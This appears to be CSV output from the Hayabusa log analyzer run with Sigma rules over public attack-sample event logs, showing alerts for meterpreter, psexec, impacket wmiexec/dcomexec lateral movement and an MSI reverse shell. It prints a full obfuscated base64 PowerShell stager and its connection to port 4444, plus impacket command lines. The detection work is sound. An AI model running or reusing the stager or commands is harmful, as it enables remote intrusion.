2019-05-01 05:26:52.106 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""powershell.exe"" -noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String('H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA=='))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd())) | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: powershell.exe -nop -w hidden -noni -c ""if([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\syswow64\WindowsPowerShell\v1.0\powershell.exe'};$s=New-Object System.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-noni -nop -w hidden -c &([scriptblock]::create((New-Object IO.StreamReader(New-Object IO.Compression.GzipStream((New-Object IO.MemoryStream(,[Convert]::FromBase64String(''H4sIAIuvyFwCA7VW+2/aSBD+OZH6P1gVErZCMA60aSJVujVPE5xADITHodNir+0lay/Ya169/u83Btym1/SuPeksHruzM7Mz33w7azcJbUF5KM2DxU1J+vTm/KyLIxxIco6MClKOmsrZGQhz5Er6KMlTtFzWeIBpOLu9rSZRREJxnBebRKA4JsGcURLLivSn9OSTiFw+zBfEFtInKfdHscn4HLOT2q6KbZ9Ilyh00rUOt3EaSdFaMirk/O+/55XppTYr1lcJZrGct3axIEHRYSyvSJ+VdMP+bknkvEntiMfcFcUnGpavioMwxi65B29rYhLhcyfOK5ADfCIikiiUIJvU/Lgo52HYjbiNHCcicZwvSNPU8XQ2+02ennZ9TEJBA1I0QkEivrRItKY2iYstHDqMPBJ3BlaWiGjozRQF1Nb8mci5MGGsIP2KG/mebDLMftZIfmkEWl0RKYW0gn/P0uROwsjRLv9KmFBzBZ5j3QGyz2/O35y7GUVWdyP6kiEwOpsexgQCk7s8pge9j1KpIJmwCRY82sE0148Sosy+wCrl3Gbhx9ZapgqKfP+0BdF0yKkzA5NTHXMbkUp/zMYacWlIarsQB9TOCCe/Bi5xGTnkV8zU7iEkOX9aIE6NMOJhkQKW1vg7s3pAxRdbPaHMIRGyoUAxRAW1U74N5lgDOW+EJgkAn+McSJdzgeYk0z5Re5ftns5BKV9lOI4LUjeBc2YXJItgRpyChMKYnpZQIvhhmP8arpkwQW0ci8zdTDmieNqtysNYRIkNBYPM+9aS2BSzFIiC1KIO0XcW9bJd86/CUMWMAfvB0xrKAJI0fUukNIicNLumUrSIMIIlIwFoHA57g2EPjvaJ4QfWYI84+W+jyxh8pGuKQpb+i9igtBbjoiANaSSgY6SIpuz5L1u/6BQQRDUipwLI2ZmY6juRMjm3H6c8PKFxyD0SkHcj4oGOY/K+cuwJ8lv1gVYRPGMjZKatP1MNbahmmPAd0LLBa9fOXXvRUqPa1neRERtmq1vrtVqVddsaVoRVN8Rd1xBmfbRYWKj1OBiLiYFafVp6Hlf2yzbdWx3kjLfq+72+35T07X7hOe645rretWs9au8atPNU7emlK9yp1ZPOk77RS5W4TjetHh30ntsNMR8PGR64qjfSbjDddqLFUOPm3kCo6ZftfdsdNn3T2Y1blCzUUof2UA+hO/txMGh6S68ZI/VmuKoG3h1CRh8jA9WHu/Y7pvcGDR0N6noPP/Bu+aKmahNnVW9MRrgdMKfZUrXxCDkoUvuer10/+GGKE/b0lZ7qoM5k11BBp1tBrcoV3U9WvaaH6qAzDDjCDfo8uBiBz/s+2DwNNIcjERojVR16qodcyx9jpIO2vkINnVd3H7pmVx0Or3xt/qz5EDMZrT+YbXTRsLuqql4Ec/hVkW0ut+FI31yvvZbF7/AdHq4nZVXrb5ouWqGLC13T56JVL7fXsG9fvRl8fJtyB8iTc/f+5AUvftTATRzFPmbAF+jN2cls8Khx6rhdTlMLWT5ezs8kCgmDCw6uwIzliDFup83+0Jzhojm2//Q2GsCwfPXqSJG+KCpfr4FMdHs7gTDh3OzHxQ4JPeEXSttyqQRdvbStlCDJn0+sypc7GRwV0jvhgMvRLzv4VdKzlPMfh1Hlf4brdIZ9+HP+Da6vsn9Y/SkIS4Vjyt+JvxX8EqK/nvsTpgJULehDjBxvv9chOJHjxYvBoTRQfff0pK91D4m4vIcXhjfnfwFhhx3MPQoAAA==''))),[IO.Compression.CompressionMode]::Decompress))).ReadToEnd()))';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle='Hidden';$s.CreateNoWindow=$true;$p=[System.Diagnostics.Process]::Start($s);"" | LID: 0x3e7 | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas,FromBase64String Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_frombase64string.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,low,Exec,Non Interactive PowerShell,,rules/sigma/process_creation/proc_creation_win_non_interactive_powershell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,high,Evas | Exec,Suspicious PowerShell Command Line,,rules/sigma/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.356 +09:00,IEWIN7,1,medium,Exec,Too Long PowerShell Commandlines,,rules/sigma/process_creation/proc_creation_win_long_powershell_commandline.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.371 +09:00,IEWIN7,10,low,,Process Access,Src Process: 50\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Tgt Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 3872 | Src PGUID: 365ABB72-AF8B-5CC8-0000-0010AC1B1900 | Tgt PID: 2484 | Tgt PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:52.371 +09:00,IEWIN7,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:53.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:33801 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:26:54.152 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49160 (IEWIN7) | Dst: 10.0.2.19:4444 () | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 2484 | PGUID: 365ABB72-AF8C-5CC8-0000-001003361900,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_psexec_smb_meterpreter.evtx
2019-05-01 05:32:50.902 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45616 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.168 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 3840 | PGUID: 365ABB72-B0F3-5CC8-0000-00105F321D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.168 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.168 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.246 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2504 | PGUID: 365ABB72-B0F3-5CC8-0000-0010B1361D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.246 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.246 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,info,,Process Created,Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding | LID: 0x1d313d | PID: 2828 | PGUID: 365ABB72-B0F3-5CC8-0000-0010C43A1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Exec,Wmiprvse Spawning Process,,rules/sigma/process_creation/proc_creation_win_wmiprvse_spawning_process.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.324 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.371 +09:00,IEWIN7,1,info,,Process Created,Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 | LID: 0x1d313d | PID: 3328 | PGUID: 365ABB72-B0F3-5CC8-0000-0010373E1D00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.371 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:51.371 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49162 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:32:52.402 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49162 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_wmiexec_impacket_sysmon_whoami.evtx
2019-05-01 05:35:11.856 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\mmc.exe -Embedding | Process: C:\Windows\System32\mmc.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x1ea3c6 | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:11.856 +09:00,IEWIN7,1,high,Exec,MMC20 Lateral Movement,,rules/sigma/process_creation/proc_creation_win_mmc20_lateral_movement.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:12.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd \ 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1504 | PGUID: 365ABB72-B180-5CC8-0000-00102BB71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:12.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:12.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:445 (IEWIN7) | Dst: 10.0.2.19:45622 () | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.168 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 10.0.2.18:49163 (IEWIN7) | Dst: 10.0.2.19:33474 () | User: IEWIN7\IEUser | Process: C:\Windows\System32\mmc.exe | PID: 3572 | PGUID: 365ABB72-B17F-5CC8-0000-001082A51E00,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:49164 (IEWIN7) | Dst: 127.0.0.1:445 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.418 +09:00,IEWIN7,3,info,,Network Connection,tcp | Src: 127.0.0.1:445 (IEWIN7) | Dst: 127.0.0.1:49164 (IEWIN7) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 365ABB72-2584-5CC9-0000-0010EA030000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.449 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 3372 | PGUID: 365ABB72-B181-5CC8-0000-0010ADBF1E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.449 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.449 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | Process: C:\Windows\System32\cmd.exe | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\mmc.exe -Embedding | LID: 0x1ea3c6 | PID: 1256 | PGUID: 365ABB72-B181-5CC8-0000-001023C41E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,Disc,Whoami Execution Anomaly,,rules/sigma/process_creation/proc_creation_win_susp_whoami_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,high,LatMov,MMC Spawning Windows Shell,,rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.512 +09:00,IEWIN7,1,low,Disc,Redirect Output in CommandLine,,rules/sigma/process_creation/proc_creation_win_cmd_redirect.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.543 +09:00,IEWIN7,1,info,,Process Created,"Cmd: whoami /all | Process: C:\Windows\System32\whoami.exe | User: IEWIN7\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 | LID: 0x1ea3c6 | PID: 692 | PGUID: 365ABB72-B181-5CC8-0000-00108DC71E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.543 +09:00,IEWIN7,1,low,Disc,Local Accounts Discovery,,rules/sigma/process_creation/proc_creation_win_local_system_owner_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 05:35:13.543 +09:00,IEWIN7,1,medium,Disc,Whoami Execution,,rules/sigma/process_creation/proc_creation_win_susp_whoami.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_impacket_docmexec_mmc_sysmon_01.evtx
2019-05-01 07:48:58.901 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Users\IEUser\AppData\Local\Temp\302a23.msi | Process: C:\Windows\System32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:48:58.901 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-00109B5A3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:48:59.260 +09:00,IEWIN7,1,info,,Process Created,Cmd: C:\Windows\system32\vssvc.exe | Process: C:\Windows\System32\VSSVC.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1892 | PGUID: 365ABB72-D0DB-5CC8-0000-0010488A3C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:08.760 +09:00,IEWIN7,2,low,Evas,Possible Timestomping,Path: C:\Windows\Installer\304d1c.msi | Process: C:\Windows\system32\msiexec.exe | CreationUtcTime: 2019-04-30 22:43:38.892 | PreviousCreationUtcTime: 2019-04-30 22:49:07.854 | PID: %PID% | PGUID: 365ABB72-D0DA-5CC8-0000-0010216F3C00,rules/hayabusa/sysmon/alerts/2_PossibleTimestomping.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:09.760 +09:00,IEWIN7,1,high,Evas,Process Created_Non-Exe Filetype,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00 | Hash: SHA1=06B1640F88EDC6A7CE3303CB14A505A86B061616,MD5=E40CF1CC132F25719F86F0FC5870910D,SHA256=A89385CCD4BE489CD069C65DA10A0B952CB3DE9090EF4C9F02E1368392CD66C5,IMPHASH=481F47BBB2C9C21E108D65F52B04C448",rules/hayabusa/sysmon/alerts/1_ProcessCreated_NonExeProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
2019-05-01 07:49:09.760 +09:00,IEWIN7,1,info,,Process Created,"Cmd: ""C:\Windows\Installer\MSI4FFD.tmp"" | Process: C:\Windows\Installer\MSI4FFD.tmp | User: IEWIN7\IEUser | Parent Cmd: C:\Windows\system32\msiexec.exe /V | LID: 0xffe4 | PID: 3680 | PGUID: 365ABB72-D0E4-5CC8-0000-00103CB73E00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/Exec_sysmon_meterpreter_reversetcp_msipackage.evtx
